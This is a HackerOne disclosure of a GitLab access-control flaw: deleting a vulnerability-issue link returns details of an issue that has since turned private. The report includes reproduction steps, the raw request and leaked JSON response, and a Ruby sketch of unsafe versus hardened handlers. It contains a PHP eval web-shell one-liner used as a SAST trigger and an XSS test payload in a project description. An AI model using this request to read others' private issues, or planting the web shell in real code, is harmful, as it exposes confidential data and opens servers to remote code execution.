Ability to access a previously accessible issue
HackerOne report #1179733 by wi11
on 2021-04-29, assigned to @ankelly:
Report
Summary
Hi team,
At GitLab, you can link an existing issue to a vulnerability, and issues can be linked across groups and projects.
A user can't link an issue that he can't access. But a user can delete an issue link he created earlier, and the related information about the issue is returned in the delete response. So if a user creates an issue link and the visibility of that issue is changed afterwards, the user can still delete the issue link to get information about an issue that he can no longer access.
Request
DELETE /api/v4/vulnerabilities/7989487/issue_links/9274 HTTP/1.1
Host: gitlab.com
Steps to reproduce
You need two accounts to reproduce this.
1. As the victim, create a public project -> create an issue.
2. As the attacker, you need to have a Vulnerability Report. (If you already have one, jump to Step 4.)
3. As the attacker -> create a project -> go to Security & Compliance -> Configuration -> enable SAST -> upload a PHP file with the code <?php eval($_POST['888']);?> to your repository -> wait for the pipeline to pass -> go to the Vulnerability report.
4. Go to the Vulnerability report -> link the issue that you created at Step 1 (paste the issue link).
5. Intercept the request: when you remove the issue link, you will intercept a request like the one shown above. Send it to the repeater; remember not to forward it, otherwise the link will be removed.
6. As the victim, change the project visibility to private and make some changes to the title and description of the issue created at Step 1.
7. As the attacker, send the request; you will find that the information of the issue is returned.
Impact
After an issue has become inaccessible to the attacker, he can still retrieve information about the issue (title, description, state, assignees, etc.).
What is the current bug behavior?
When an issue link to a previously accessible issue was deleted, the information of the now inaccessible issue was returned.
DELETE /api/v4/vulnerabilities/[REDACTED]/issue_links/9274 HTTP/1.1
Host: gitlab.com
Connection: close
Accept: application/json, text/plain, */*
X-CSRF-Token:
X-Requested-With: XMLHttpRequest
Origin: https://gitlab.com
Accept-Encoding: gzip, deflate
Cookie:
HTTP/1.1 200 OK
Date: Thu, 29 Apr 2021 06:21:32 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, HEAD, POST, PUT, PATCH, DELETE, OPTIONS
Access-Control-Allow-Origin: https://gitlab.com
Access-Control-Expose-Headers: Link, X-Total, X-Total-Pages, X-Per-Page, X-Page, X-Next-Page, X-Prev-Page, X-Gitlab-Blob-Id, X-Gitlab-Commit-Id, X-Gitlab-Content-Sha256, X-Gitlab-Encoding, X-Gitlab-File-Name, X-Gitlab-File-Path, X-Gitlab-Last-Commit-Id, X-Gitlab-Ref, X-Gitlab-Size
Access-Control-Max-Age: 7200
Cache-Control: max-age=0, private, must-revalidate
Etag: W/"23a17e185fb2cd10bfa81a06e6f25d84"
Vary: Origin
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Gitlab-Feature-Category: vulnerability_management
X-Request-Id: 01F4E4M9NQCH1XTG95DP4NQGNJ
X-Runtime: 0.237133
Strict-Transport-Security: max-age=31536000
Referrer-Policy: strict-origin-when-cross-origin
RateLimit-Observed: 9
RateLimit-Remaining: 1991
RateLimit-Reset: 1619677352
RateLimit-ResetTime: Thu, 29 Apr 2021 06:22:32 GMT
RateLimit-Limit: 2000
GitLab-LB: fe-09-lb-gprd
GitLab-SV: localhost
CF-Cache-Status: DYNAMIC
cf-request-id: 09bde33e1e00001a5e7033d000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 64766e4368b11a5e-SIN
Content-Length: 3692
{"id":9274,"vulnerability":{"id":7989487,"title":"Please do not use eval() functions","description":null,"state":"confirmed","severity":"high","confidence":"unknown","report_type":"sast","project":{"id":25475655,"description":"bug test bug test bug test bug test !!!!!'\"\u003e\u003cimg src=zqzq onerror=alert(1)\u003e","name":"easy-money-maker","name_with_namespace":"ezgama / easy-money-maker","path":"a-project","path_with_namespace":"ezgama/a-project","created_at":"2021-03-28T06:36:35.788Z"},"finding":{"id":9486278,"created_at":"2021-04-06T08:16:39.241Z","updated_at":"2021-04-06T08:16:39.500Z","severity":"high","confidence":"unknown","report_type":"sast","project_id":25475655,"scanner_id":95603,"primary_identifier_id":2065399,"project_fingerprint":"b7b70a4e7acf2a02fd311dc34504a007f757bde4","location_fingerprint":"78df993d22174e7368adc689a1ed89fb927cbfbf","uuid":"6597da14-4b91-556d-b041-7d89d74fc1fb","name":"Please do not use eval() functions","metadata_version":"14.0.0","raw_metadata":"{\"id\":\"389d0a0ec7a6b2c2e6b8da2ab910aa123ee9bf462411c4de6c9bafe8e492ac7b\",\"category\":\"sast\",\"name\":\"Please do not use eval() functions\",\"message\":\"Please do not use eval() functions\",\"description\":\"Please do not use eval() functions\",\"cve\":\"mama.php:PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\",\"severity\":\"High\",\"scanner\":{\"id\":\"phpcs_security_audit\",\"name\":\"phpcs-security-audit v2\"},\"location\":{\"file\":\"mama.php\",\"start_line\":1},\"identifiers\":[{\"type\":\"phpcs_security_audit_source\",\"name\":\"PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\",\"value\":\"PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\"}],\"remediations\":[null]}","vulnerability_id":7989487,"details":{},"description":"Please do not use eval() functions","message":"Please do not use eval() functions","solution":null,"cve":"mama.php:PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals","location":{"file":"mama.php","start_line":1}},"resolved_on_default_branch":false,"project_default_branch":"master","author_id":8546086,"updated_by_id":null,"last_edited_by_id":null,"resolved_by_id":null,"dismissed_by_id":null,"confirmed_by_id":8546086,"start_date":null,"due_date":null,"created_at":"2021-04-06T08:16:39.453Z","updated_at":"2021-04-29T05:46:07.075Z","last_edited_at":null,"resolved_at":null,"dismissed_at":null,"confirmed_at":"2021-04-29T05:23:52.331Z"},"issue":{"id":86180604,"iid":16,"project_id":25969925,"title":"BUGSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS","description":"BUGBGUBGUBUGBUGBUGBUGSDDDDDDDDDDDDDDDDDDDDDDDDDD","state":"opened","created_at":"2021-04-29T05:57:17.615Z","updated_at":"2021-04-29T06:21:08.450Z","closed_at":null,"closed_by":null,"labels":[],"milestone":{"id":2023885,"iid":1,"group_id":11753634,"title":"group milestone","description":"","state":"active","created_at":"2021-04-29T05:10:02.829Z","updated_at":"2021-04-29T05:10:02.829Z","due_date":null,"start_date":null,"expired":null,"web_url":"https://gitlab.com/groups/dvadegroup/-/milestones/1"},"assignees":[],"author":{"id":8696838,"name":"dva dva","username":"dva_dva","state":"active","avatar_url":"https://assets.gitlab-static.net/uploads/-/system/user/avatar/8696838/avatar.png","web_url":"https://gitlab.com/dva_dva"},"assignee":null,"user_notes_count":0,"merge_requests_count":0,"upvotes":0,"downvotes":0,"due_date":"2021-08-20","confidential":true,"discussion_locked":null,"web_url":"https://gitlab.com/dvadegroup/dvadeproject/-/issues/16","time_stats":{"time_estimate":0,"total_time_spent":0,"human_time_estimate":null,"human_total_time_spent":null},"task_completion_status":{"count":0,"completed_count":0},"weight":100,"blocking_issues_count":0},"link_type":"related"}
What is the expected correct behavior?
The information of the inaccessible issue should not be returned.
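The root cause described in the Summary and in the expected behavior above is that the delete action is authorized (the caller created the link) but the linked issue is serialized into the response without a fresh read check. The following Ruby model, added here as an illustration and not taken from GitLab's code base, puts the unsafe handler next to a hardened one that re-checks read access on every entity at response time. All classes (Project, Issue, IssueLink, IssueLinkStore), the readable_by? rule and the sample data are constructed for this example; only the link id 9274 and vulnerability id 7989487 are taken from the report.

```ruby
# Added illustration, not GitLab's code: a minimal model of a
# "delete issue link" endpoint, showing the unsafe pattern from the
# report next to a hardened version. Names and data are constructed.

Project = Struct.new(:id, :visibility, :member_ids) do
  # Assumed rule: a public project is readable by anyone, a private
  # project only by its members.
  def readable_by?(user_id)
    visibility == :public || member_ids.include?(user_id)
  end
end

Issue = Struct.new(:id, :project, :title, :description, :state)

# Link between a vulnerability and an issue; created_by records who linked it.
IssueLink = Struct.new(:id, :vulnerability_id, :issue, :created_by)

class IssueLinkStore
  def initialize(links)
    @links = links.to_h { |l| [l.id, l] }
  end

  def find(id)   = @links.fetch(id)
  def delete(id) = @links.delete(id)
  def exist?(id) = @links.key?(id)
end

def serialize_issue(issue)
  { id: issue.id, title: issue.title, description: issue.description, state: issue.state }
end

# Vulnerable behaviour: the action (deleting a link you created) is authorized,
# but the linked issue is serialized unconditionally, so a caller who has since
# lost access to the issue still receives its current fields.
def delete_link_unsafe(store, link_id, current_user_id)
  link = store.find(link_id)
  raise "forbidden" unless link.created_by == current_user_id
  store.delete(link_id)
  { id: link.id, issue: serialize_issue(link.issue) }
end

# Hardened behaviour: every entity in the response gets its own read check at
# response time. If the caller cannot read the issue now, it is omitted and only
# the link id, which the caller already knew, is returned.
def delete_link_safe(store, link_id, current_user_id)
  link = store.find(link_id)
  raise "forbidden" unless link.created_by == current_user_id
  store.delete(link_id)
  body = { id: link.id }
  body[:issue] = serialize_issue(link.issue) if link.issue.project.readable_by?(current_user_id)
  body
end

# Constructed scenario: user 2 linked the issue while user 1's project was
# public; with go_private the project is then flipped to private and the
# issue edited, exactly the sequence from the reproduction steps.
def build_scenario(go_private: true)
  project = Project.new(10, :public, [1])
  issue = Issue.new(16, project, "original title", "original body", "opened")
  link = IssueLink.new(9274, 7989487, issue, 2)
  store = IssueLinkStore.new([link])
  if go_private
    project.visibility = :private
    issue.title = "edited after going private"
  end
  [store, link.id]
end

if __FILE__ == $0
  store, link_id = build_scenario
  puts delete_link_unsafe(store, link_id, 2).inspect # leaks the edited title
  store, link_id = build_scenario
  puts delete_link_safe(store, link_id, 2).inspect   # {:id=>9274}
end
```

The design point is that authorization on the action (may this user delete this link?) and authorization on the data returned (may this user read this issue right now?) are separate checks; the second one must be evaluated against the current state of the issue's project, not the state at the time the link was created.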
Output of checks
This bug happens on GitLab.com